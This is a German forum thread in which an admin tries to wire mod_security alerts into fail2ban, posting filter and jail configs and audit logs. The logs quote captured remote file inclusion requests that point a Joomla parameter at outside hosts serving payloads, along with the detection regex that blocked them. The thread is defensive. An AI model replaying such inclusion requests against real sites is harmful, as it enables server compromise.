Threaded Mode | Linear Mode

fulltilt · 02-21-2008 08:54 PM

Kennt jemand eine Möglichkeit um mod_security an iptables anzubinden?
Also wenn z.b. eine regex aus einer der confs passt das dann direkt geblockt wird. Modsecurity schickt zwar die Fehlerseite aber wenn jemand Rootkits installieren will, kostet das ganze sehr viel Leistung.

**BeNe** · 02-21-2008 09:01 PM

Quote:Also wenn z.b. eine regex aus einer der confs passt das dann direkt geblockt wird

Wäre eigentlich das Thema von FAIL2BAN. Das hast Du ja auch schon im Einsatz.

Greez BeNe

fulltilt · 02-21-2008 09:15 PM

Hi BeNe,

müsste auch über fail2ban klappen ... aber kann man die regex nicht so umschreiben das statt 403 - iptables blockt?

Also solche Logs direkt blockieren ohne erst ne Fehlermeldung:

Code:

GET /?mosConfig_absolute_path=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1

TE: deflate,gzip;q=0.3

Connection: TE, close

Host: www.xxxxxxxxxx.tld

User-Agent: libwww-perl/5.808

--ba07427a-H--

Message: Access denied with code 403 (phase 2). Pattern match "(\\.\\./\\.\\.|/|(http|https|ftp)\\:/)" at ARGS:mosConfig_absolute_path. [id "390075"] [rev "1"] [msg "JITP: Generic mosConfig_absolute_path File Inclusion Vulnerability"] [severity "CRITICAL"]

Action: Intercepted (phase 2)

Producer: ModSecurity v2.1.1 (Apache 2.x)

fulltilt · 02-21-2008 09:49 PM

Ich hab es mal so probiert:

In filter.d angelegt: apache-modsec.conf

Code:

[Definition]

# Option:  failregex

# Notes.:  regex to match the password failure messages in the logfile. The

#          host must be matched by a group named "host". The tag "<HOST>" can

#          be used for standard IP/hostname matching.

# Values:  TEX

#

failregex = [[]client <HOST>[]] Message: Access denied with code 403

# Option:  ignoreregex

# Notes.:  regex to ignore. If this regex matches, the line is ignored.

# Values:  TEXT

#

ignoreregex =

in jail.conf:

Code:

[apache-modsec]

enabled = true

port    = http

filter  = apache-modsec

logpath = /var/log/apache*/mod-security2.log

maxretry = 1

Ich nutze modsecurity2 welches nach /var/log/apache*/mod-security2.log loggt.

Ist das oben soweit richtig zu diesem Log bzw. funktioniert das so?
Die IP des Angreifers steht in der ersten Zeile und dahinter gleich die meines Servers.
Die Logeinträge sehen so aus:

Code:

--e97c4236-A--

[21/Feb/2008:10:30:30 +0100] wbi3aMMYTXsAAGuGDoQAAAAX xx.117.225.155 33139 xxx.xx.xx.xxx 80

--e97c4236-B--

GET /content/view/20/38//?mosConfig_absolute_path=http://onlypets.net/id.txt?? HTTP/1.1

TE: deflate,gzip;q=0.3

Connection: TE, close

Host: www.tld.tld

User-Agent: libwww-perl/5.808

--e97c4236-F--

HTTP/1.1 403 Forbidden

Last-Modified: 

ETag: "119xxxxxxxxxxx56540"

Accept-Ranges: bytes

Content-Length: 1136

Vary: Accept-Encoding,User-Agent

Connection: close

Content-Type: text/html; charset=ISO-8859-1

--e97c4236-H--

Message: Access denied with code 403 (phase 2). Pattern match "(\\.\\./\\.\\.|/|(http|https|ftp)\\:/)" at ARGS:mosConfig_absolute_path. [id "390075"] [rev "1"] [msg "JITP: Generic mosConfig_absolute_path File Inclusion Vulnerability"] [severity "CRITICAL"]

Action: Intercepted (phase 2)

--e97c4236-Z--

**BeNe** · 02-21-2008 10:13 PM

Ja, das könnte so funktionieren. Lass es einfach mal so laufen und schaue in dann in die Log von Fail2ban. Sonst müssen wir das regex anpassen.

Greez BeNe

fulltilt · 02-21-2008 10:25 PM

Danke BeNe,

poste ich hier später ...
Sonst habe ich relativ viele solcher Angriffe ... momentan ist alles ruhig :-)

BeNe Wrote:Ja, das könnte so funktionieren. Lass es einfach mal so laufen und schaue in dann in die Log von Fail2ban. Sonst müssen wir das regex anpassen.

Greez BeNe

fulltilt · 02-22-2008 06:45 PM

Hm - klappt leider noch nicht so ...
Ich denke es ist wg. der Logeinträge von modseurity2.

Die IP des Angreifers müsste wohl direkt vorne stehen mit dem Teil der regex.

Kann das Logformat so angepasst werden?

Code:

# Logfile

SecAuditEngine RelevantOnly

SecAuditLogRelevantStatus "^[45]"

SecAuditLogType Serial

SecAuditLog /var/log/apache2/mod-security2.log

SecAuditLogParts "ABIFHZ"

**BeNe** · 02-22-2008 10:43 PM

Ich habe leider auf keinem Server Mod_Security laufen daher kann ich Dir hier nicht mehr groß weiterhelfen Sad

Aber vielleicht findet sich ja was in anderen Foren zu dem Thema.

Greez BeNe

fulltilt · 02-22-2008 10:49 PM

Danke BeNe,

ich teste mal alles durch mit den Log Formats ...

BeNe Wrote:Ich habe leider auf keinem Server Mod_Security laufen daher kann ich Dir hier nicht mehr groß weiterhelfen
Aber vielleicht findet sich ja was in anderen Foren zu dem Thema.

Greez BeNe

Rene · 02-24-2008 12:32 AM

Hallo,

Quote:Die IP des Angreifers müsste wohl direkt vorne stehen mit dem Teil der regex

Quote:

Code:

failregex = [[]client <HOST>[]] Message: Access denied with code 403

also wenn du das so formulierst, dann ja Wink

du solltest es schon anpassen und nicht einfach aus anderen Regeln kopieren ohne zu wissen was es bedeutet.

wenn im log ein Zweizeiler ist, hast du pech. die IP muss in der selben Zeile stehen wie die Fehlermeldung.

Edit:
Die Zeile musst du nutzen:

Quote:

Code:

[21/Feb/2008:10:30:30 +0100] wbi3aMMYTXsAAGuGDoQAAAAX xx.117.225.155 33139 xxx.xx.xx.xxx 80

Threaded Mode \| Linear Mode [Erledigt] iptables apache anbindung
Author	Message